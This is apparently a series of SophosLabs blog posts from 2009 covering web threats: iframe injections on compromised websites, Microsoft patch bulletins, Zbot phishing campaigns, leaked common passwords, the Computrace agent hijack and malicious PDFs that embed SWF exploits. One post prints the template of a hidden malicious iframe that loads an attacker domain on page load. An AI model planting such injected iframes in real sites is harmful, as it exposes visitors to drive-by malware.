SophosLabs blog

Before everybody peruses the ‘net in search of their fish supper this cold and wet Friday night.* Stop!!

Do you have adequate protection?

For your Internet browsing?

Earlier this week SophosLabs spotted that the famous chip shop brand Harry Ramsden’s website had been haked by a malicious iframe. I codn’t believe it when I saw that the mootools.js script on the site is infected with Troj/Iframe-DF meaning that the website isn’t the plaice to visit.

The injected code is all mushed up though so the malicious script may be floundering.

The obfuscated iframe points to a haked site in Germany that when you go there redirects you to a fake Google site registered in the EU. Which triggers Troj/ObfJS-R.

I don’t want to carp on about the responsibilities of Web masters and Web hosters but they really have to protect their sites as well as tuna them up.

All this talk of fish’n'chips has made me hungry for a chip butty.

*Apologies for the puntastic tabloid style of this post but it is Friday :)

This month’s “Patch Tuesday” includes 6 security updates - of which Microsoft has rated 3 as Critical (all remote code execution vulnerabilities) and 3 Important (two remote code execution vulnerabilities and one denial of service).

Mention-worthy updates this month include MS09-065 and MS09-068.

MS09-065 addresses several kernel vulnerabilities. The vulnerability of particular concern is related to specially crafted Embedded OpenType fonts, and could be exploited to run unauthorized code in the system context.

Most remote code execution vulnerabilities we see typically run in the user context at the same privilege level as the currently authenticated user. Now, if you’re the user this means that all your files are at risk, but the system itself is reasonably safe (unless your administrator hasn’t been adhering to best practices, and has granted you administrative privileges … in which case you’ve pretty much granted the attacker’s code access to the entire box). With this kernel-mode driver remote code execution vulnerability, the current user’s privilege level is irrelevant. It doesn’t matter how unprivileged the current user is - the unauthorized code has unfettered access to the local system. Assuming, that is, the attacker doesn’t destabilize the system and BSOD before their code runs. Kernel vulnerabilities have a habit of not just bringing down processes, but bringing down entire boxes.

MS09-068 is mention-worthy, as it addresses issues in Microsoft Word, for both the Windows AND Apple platforms. Windows users that have automatic updates configured will automatically have protection provided to them - but Apple users will have to rely on the Microsoft Office Update Utility “Microsoft AutoUpdate” or go to here, here or here, to download the relevant update.

You can find the rest of our analysis here.

And, as always, if you’ve found our vulnerability posts to be valuable, or have some suggestions for how we can better serve you, please let us know at sophosblog@sophos.com

In the past few weeks, the authors behind Zbot has been busy. Around October 12 we have seen the server upgrade spam with links. Later on the 14th we’ve seen the same campaign with the malware attached to similar-looking server upgrade notices. By the 22nd of October, the spam messages touts Outlook updates.

For a few days during the past week, the group has turned their attention to the Federal Deposit Insurance Corporation (FDIC), spamming out links to malware sites with the message below:

With the global economy as it is, notice of bank failures would certainly draw a lot of attention and irrational behavior. After all, thoughts of hard-earned money being gone forever is going to scare a lot of people. Of course, downloading the “personal FDIC insurance file” would give nothing but grief. The bank deposits are still safe, but the computer would probably get infected.

After the blast of FDIC messages, the Zbot authors turned to facebook as their latest platform to spread malware. However, they added a twist to it. The messages are well-crafted to look like a real Facebook message:

The message asks the user to update their facebook account. The new twist is that, when they get to the linked site, there is no link to download an executable yet. Instead, they’re shown with a fake Facebook login page:

Victims who have entered their facebook login would get their account details phished, probably for the purpose of spreading more malware. Since this is not a real facebook page, any random login info would bring you to this next page:

It is on this page where the malware author provides an executable for download. This file, updatetool.exe is a Zbot executable that is proactive detected as Mal/EncPk-LE.

With the creative social engineering that the Zbot authors have been using, users should be real careful when reading messages, whether it’s in an email or from a social network. Avoid clicking links directly, manually type the address to access the site, and not executing files would do a lot in protecting one’s computer.

Since releasing detection for Mal/Iframe-N on Wednesday (21st Oct) SophosLabs have seen a rising number of detections. Detections are now into the thousands of websites affected by this threat. A couple of the sites hit are well known and one of them that I previously talked about as having been infected is the official Van Morisson site.

Even though this site is effectively down for improvement there is still an infection!

I thought that I would take some time explain a little more about this particular web threat.

What is so special about Mal/Iframe-N?

Normally, malicious Iframe’s have the following form:
<iframe src=http://DOMAIN.TLD width=N height=N> where N is a small number.

Whereas, in the new attack there isn’t a direct src= they use onload= like this:

<iframe onload="if (!this.src){ this.src='http://DOMAIN.TLD'; this.height=N; this.width=N;}"> again N is a small number.

All the domains used so far have been based in Russia.

The tools being used to inject these Iframes is currently appending them to the end of legitimate HTML.

The Disney song ”The Wonderful Thing About Tiggers” has the lyric:

I’m the only one!
I-I-I-I’m…..the only one!

Except, it seems when we are talking about passwords in the latest list of ‘phished’ * passwords. Thanks to the people on Neowin the blog for pointing me at the data. After a quick analysis of the list, some of the most popular passwords are:

neopets
123456
monkey
123321
tigger
password
princess
pokemon
kitty
casper
123456789
neopet
anime
iloveyou

As well as being insecure, these passwords suggest a preoccupation with children’s popular culture. I would advise that parents not only change their passwords and check their computer security, but that they also ensure their kids’ change their passwords on their email accounts as well as any online forums they belong too.

* There is some debate in SophosLabs about these recent password lists as to whether they are the result of traditional spam phishes or other things.

Personally, I think that this data is a combination of

• some phishing emails
• keylogger data
• and a rogue social networking application phishing information

However this password list was compiled, all users should follow a password routine.

Simple tips for better web password security from SophosLabs on Vimeo.

UPDATE: This appears to have been a pen-test.

There are reports (via ISC) that US Banking institutions have been subject to phishing attempts via snail mail.

Reportedly, the Credit Unions receive a package containing a letter from the NCUA and a CD with training material on it. If indeed the training material is actually malware, then one would suspect it is most likely to consist of some backdoor Trojan or a keylogger.

The NCUA press release give slightly more information on this threat with some instructions on what to do if you do receive the letter:

• You should contact your NCUA Regional Office
• or the NCUA Fraud Hotline at 1-800-827-9650

Added to this advice please contact your AV supplier and forward them a copy of the CD.

You can contact Sophos via:

Sophos Inc.
3 Van de Graaff Drive
2nd Floor
Burlington, MA
01803
USA

Tel: 781-494-5800
Fax: 781-494-5801

Two very talented researchers from CoreSecurity have recently presented at BlackHat about a new twist in the saga of security products whose presence may actually be a security risk. Anibal Sacco and Alfredo Ortega have exposed the presence, and potential security risk, of a post-theft-recovery product that may already be installed on your laptop.

These two have exposed a vulnerability in the security model of Absolutes Corp’s Computrace Anti-Theft Agent, that comes included in the BIOS of most notebooks sold since 2005. The Absolutes Computrace technology is designed to report the location of a laptop, and in the event of theft, allow the data on the laptop to be deleted.

When activated, the BIOS component of Computrace directly alters the Windows filesystem to install and activate its agent. Once Windows has started up, this agent runs as a Windows service which connects out to a remote server to wait for instructions. At BlackHat2009, Anibal and Alfredo demonstrated how an unauthorized privileged user could hijack the agent to contact a server of their choice. Unfortunately for AV vendors, a hijacked agent is identical to legitimate ones. The only changes on the system are to a region of memory that direct where the agent reports to. The agent’s executable remains unchanged.

Many security professionals (including the authors) are referring to this as a rootkit. I personally think this is more of an extremely persistent backdoor. But those that call it a rootkit, have a decent reason for doing so. Unlike most rootkits, this doesn’t actually hide anything. The purpose of rootkits is typically to avoid detection so that hackers control of a system can persist as long as possible. The parallel between this insecurity and most rootkits is the persistence aspect. If abused, this could potentially be used to provide an indirect backdoor into your system that could survive reformats, and even the complete replacement of your hard drive.

So… Do you think Sophos should detect the Computrace Agent? Let us know what you think!

Over the weekend, SophosLabs received a strange PDF from a source who sends us large numbers of malicious files of Chinese origin. The PDF file contained two EXE files and two SWF files.

The EXEs were stored within the PDF XOR encrypted with the bytes 0x97 and 0xa0 which immediately tweaked the interest of the analyst. After subsequent analysis of the files he wrote three identities Troj/PDFEx-BJ, Troj/Agent-KPF and Troj/SWFExp-M for the PDF file, the EXE files and one of the SWF files.

Over the last few days we have seen more files exhibiting similar characteristics. What is happening?

The initial PDF file has several embedded streams (According to Didier Stevens, PDFiD has 18 embedded streams) the interesting bits are: two SWF files and one mini-PDF file.

The mini-PDF file has some interesting features (underlined in red):

As we can see from the above the image there are Embedded files and it is using RealMediaContent.

Here we see two SWF files (fancyBall.swf and oneoff.swf) referenced and run by the PDF.

The first SWF, fancyBall.swf, is just a simple little flash with a ball that will crash and the will allow the second code in the second SWF file to run.

The other SWF, oneoff.swf, is more insidious (and I have updated detection for Troj/SWFExp-M to detect more variants) which by using manipulating shellcode will attempt to extract the EXE files and run them. Different instances of this malware have had different names including save.swf and oneoff.swf.

SophosLabs yesterday released detection for Mal/PDFEx-G to generically detect the malicious PDFs.

Currently, US-CERT recommends some the following workarounds:

• Disable Flash in Adobe Reader 9 on Windows platforms by renaming the following files: “%ProgramFiles%\Adobe\Reader 9.0\Reader\authplay.dll” and “%ProgramFiles%\Adobe\Reader 9.0\Reader\rt3d.dll”.

• Disable Flash Player or selectively enable Flash content as described in the Securing Your Web Browser Document.

As always SophosLabs endeavors to provide customers with proactive detection via identities and product features (HIPs and BOPs).

Latest set of Microsoft Security Bulletins comes only a day after the publicly exploited vulnerability in Office Web Components was disclosed and exploited by several websites hosted in China.

There are 3 Bulletins rated Critical by Microsoft and those are the most interesting for malware writers too, with exploits for MS09-032 already seen in the wild for more than a week. All currently known exploits for MS09-032 are detected by Sophos products as Exp/VidCtl-A or proactively as Troj/JSShell-D.

MS09-029 is an vulnerability in Embedded OpenType Font Engine which allows the attacker to take complete control over the victim’s system by serving maliciously crafted font files embedded in web pages. This vulnerability has a potential to become popular in the malware writing circles considering its web based delivery mechanism.

As always, we have created our own vulnerability analyses and we will be looking actively for any new exploits appearing in the next few weeks to add the detection for them.

Vulnerabilities in Microsoft DirectShow Could Allow Remote Code Execution - MS09-028
Vulnerabilities in the Embedded OpenType Font Engine Could Allow Remote Code Execution
Cumulative Security Update of ActiveX Kill Bits

Only a week after the serious vulnerability in the MPEG2TuneRequest ActiveX Control Object, Microsoft has released a security advisory documenting a remote execution vulnerability affecting Microsoft Office Web Components that may allow attacker to take control over the victim’s machine by creating a malicious web page.

Sophos has received reports of several websites, mostly hosted in China that serve the exploit as a part of a web exploit kit that downloads and runs a Windows executable detected by Sophos products as Mal/Generic-A.

The newly announced vulnerability is serious as there are no patches yet but a workaround has been documented by Microsoft. SophosLabs are in the process of collecting all known samples and publishing detection for them as Exp/OWCRef-A.

As usual we have written SophosLabs analysis of the vulnerability, which includes SophosLabs threat level - Critical since the patch is not yet available. Since tomorrow is a Microsoft Patch Tuesday there will be more to report on soon.